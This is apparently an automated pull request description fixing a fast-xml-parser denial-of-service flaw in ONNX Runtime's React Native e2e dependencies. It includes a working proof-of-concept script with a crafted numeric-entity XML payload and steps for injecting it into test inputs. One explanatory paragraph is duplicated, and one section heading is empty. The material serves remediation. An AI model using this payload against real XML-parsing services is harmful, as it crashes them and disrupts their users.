Security Fix

This PR addresses a HIGH severity vulnerability detected by our security scanner.

Security Impact Assessment

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The fast-xml-parser library, used as a dependency in the React Native e2e tests for ONNX Runtime (as locked in js/react_native/e2e/package-lock.json), is vulnerable to a RangeError denial-of-service (DoS) attack via crafted XML containing numeric entities. An attacker could exploit this by providing malicious XML input to any part of the React Native app or e2e test suite that parses XML using this library, causing the process to crash with a RangeError. This is particularly relevant if the app accepts XML from user inputs, network requests, or test data, leading to service disruption during inference tasks or testing workflows.

The fast-xml-parser library, used as a dependency in the React Native e2e tests for ONNX Runtime (as locked in js/react_native/e2e/package-lock.json), is vulnerable to a RangeError denial-of-service (DoS) attack via crafted XML containing numeric entities. An attacker could exploit this by providing malicious XML input to any part of the React Native app or e2e test suite that parses XML using this library, causing the process to crash with a RangeError. This is particularly relevant if the app accepts XML from user inputs, network requests, or test data, leading to service disruption during inference tasks or testing workflows.

// PoC exploit script demonstrating the DoS in fast-xml-parser
// This reproduces CVE-2026-25128 by parsing XML with problematic numeric entities
// Run this in a Node.js environment with fast-xml-parser installed (as per the repo's package-lock.json)

const { XMLParser } = require('fast-xml-parser');

// Malicious XML payload that triggers RangeError due to numeric entity overflow
const maliciousXml = `
<root>
  <data>&#${'9'.repeat(100000)};</data>  <!-- Large numeric entity causing RangeError -->
</root>
`;

try {
  const parser = new XMLParser();
  const result = parser.parse(maliciousXml);  // This will throw RangeError: Maximum call stack size exceeded or similar
  console.log('Parsed successfully:', result);
} catch (error) {
  console.log('Exploitation successful: RangeError thrown -', error.message);
  // In the ONNX Runtime React Native context, this could crash the e2e test process or app during XML parsing (e.g., if parsing model metadata or test inputs)
}

# Steps to reproduce in the repository context:
# 1. Clone the repo and navigate to the React Native directory
git clone https://github.com/microsoft/onnxruntime.git
cd onnxruntime/js/react_native

# 2. Install dependencies (this will use the vulnerable fast-xml-parser from package-lock.json)
npm install

# 3. Run the PoC script above (save as exploit.js and execute)
node exploit.js

# 4. In e2e tests, if XML parsing is involved (e.g., via test data or mocked inputs), inject the malicious XML payload into test files or inputs to trigger DoS during test execution
# Example: Modify a test file in e2e/ to include the malicious XML, then run tests
npm run test:e2e  # This may crash if XML parsing occurs

# Note: Exploitation requires the app or tests to parse attacker-controlled XML; in production React Native apps using ONNX Runtime, this could be via network APIs or user-uploaded data.

Exploitation Impact Assessment

Vulnerability Details

• Rule ID: CVE-2026-25128
• File: js/react_native/e2e/package-lock.json
• Description: fast-xml-parser: fast-xml-parser has RangeError DoS Numeric Entities Bug

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

• js/react_native/e2e/package.json
• js/react_native/e2e/package-lock.json

Verification

This fix has been automatically verified through:

• ✅ Build verification
• ✅ Scanner re-scan
• ✅ LLM code review

🤖 This PR was automatically generated.